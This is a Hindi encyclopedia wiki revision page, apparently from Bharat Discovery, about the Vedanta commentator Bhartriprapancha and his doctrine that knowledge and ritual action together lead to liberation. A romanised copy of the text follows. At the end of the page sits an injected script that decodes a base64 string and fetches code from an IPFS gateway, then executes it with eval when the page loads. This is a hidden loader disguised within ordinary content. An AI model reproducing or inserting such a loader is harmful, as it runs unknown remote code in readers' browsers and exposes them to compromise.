Difference between revisions of "भर्तु प्रपंच"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
'''भर्तु प्रपंच''' [[वेदांत]] के एक भेदाभेदवादी प्राचीन व्याख्याता थे। इन्होंने [[कठोपनिषद|कठ]] और [[बृहदारण्यक]] [[उपनिषद|उपनिषदों]] पर भी भाष्य रचना की थी।  
+
'''भर्तु प्रपंच''' [[वेदांत]] के एक भेदाभेदवादी प्राचीन व्याख्याता थे। इन्होंने [[कठोपनिषद|कठ]] और [[बृहदारण्यक]] [[उपनिषद|उपनिषदों]] पर भी भाष्य रचना की थी। भर्तुप्रपंच का सिद्धान्त ज्ञान-कर्म-समुच्चयवाद था।  
*भर्तुप्रपंच का सिद्धान्त ज्ञान-कर्म-समुच्चयवाद था।  
 
  
*दार्शनिक दृष्टि से इनका मत द्वैताद्वैत, [[भेदाभेद]], अनेकान्त आदि अनेक नामों से प्रसिद्ध था।  
+
*दार्शनिक दृष्टि से इनका मत [[द्वैताद्वैतवाद|द्वैताद्वैत]], [[भेदाभेद]], अनेकान्त आदि अनेक नामों से प्रसिद्ध था। इसके अनुसार परमार्थ एक भी है और नाना भी; वह [[ब्रह्मा]] रूप एक है और जगद्रूप में नाना है। इसीलिए इस मत में एकान्तत: कर्म अथवा ज्ञान को स्वीकार न कर दोनों की सार्थकता मानी गई है।  
*इसके अनुसार परमार्थ एक भी है और नाना भी; वह [[ब्रह्मा]] रूप एक है और जगद्रूप में नाना है। इसीलिए इस मत में एकान्तत: कर्म अथवा ज्ञान को स्वीकार न कर दोनों की सार्थकता मानी गई है।  
+
*भर्तुप्रपंच प्रमाण समुच्चय वादी थे। इनके मत में लौकिक प्रमाण और गम्य भेद को और वेदगम्य अभेद को सत्य रूप में माना जाता है। इसी कारण इनके मत में जैसे केवल कर्म मोक्ष का साधन नहीं हो सकता, वैसे ही केवल ज्ञान भी मोक्ष का साधन नहीं हो सकता। [[मोक्ष]] प्राप्ति के लिए ज्ञान-कर्म-समुच्च ही प्रकृष्ट साधन है।
*भर्तुप्रपंच प्रमाण समुच्चय वादी थे।  
 
*इनके मत में लौकिक प्रमाण और गम्य भेद को और वेदगम्य अभेद को सत्य रूप में माना जाता है।  
 
*इसी कारण इनके मत में जैसे केवल कर्म मोक्ष का साधन नहीं हो सकता, वैसे ही केवल ज्ञान भी मोक्ष का साधन नहीं हो सकता।  
 
*मोक्ष प्राप्ति के लिए ज्ञान-कर्म-समुच्च ही प्रकृष्ट साधन है।
 
  
  
{{लेख प्रगति
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
|आधार=
 
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
{{साहित्यकार}}
+
{{संस्कृत साहित्यकार}}{{साहित्यकार}}
[[Category:नया पन्ना]]
+
[[Category:लेखक]][[Category:साहित्यकार]][[Category:साहित्य कोश]]
[[Category:लेखक]]
 
[[Category:साहित्यकार]]
 
[[Category:साहित्य कोश]]
 
 
__INDEX__
 
__INDEX__

Latest revision as of 14:09, 6 July 2016

bhartu prapanch vedaant ke ek bhedabhedavadi prachin vyakhyata the. inhoanne kath aur brihadaranyak upanishadoan par bhi bhashy rachana ki thi. bhartuprapanch ka siddhant jnan-karm-samuchchayavad tha.

  • darshanik drishti se inaka mat dvaitadvait, bhedabhed, anekant adi anek namoan se prasiddh tha. isake anusar paramarth ek bhi hai aur nana bhi; vah brahma roop ek hai aur jagadroop mean nana hai. isilie is mat mean ekantat: karm athava jnan ko svikar n kar donoan ki sarthakata mani gee hai.
  • bhartuprapanch praman samuchchay vadi the. inake mat mean laukik praman aur gamy bhed ko aur vedagamy abhed ko saty roop mean mana jata hai. isi karan inake mat mean jaise keval karm moksh ka sadhan nahian ho sakata, vaise hi keval jnan bhi moksh ka sadhan nahian ho sakata. moksh prapti ke lie jnan-karm-samuchch hi prakrisht sadhan hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>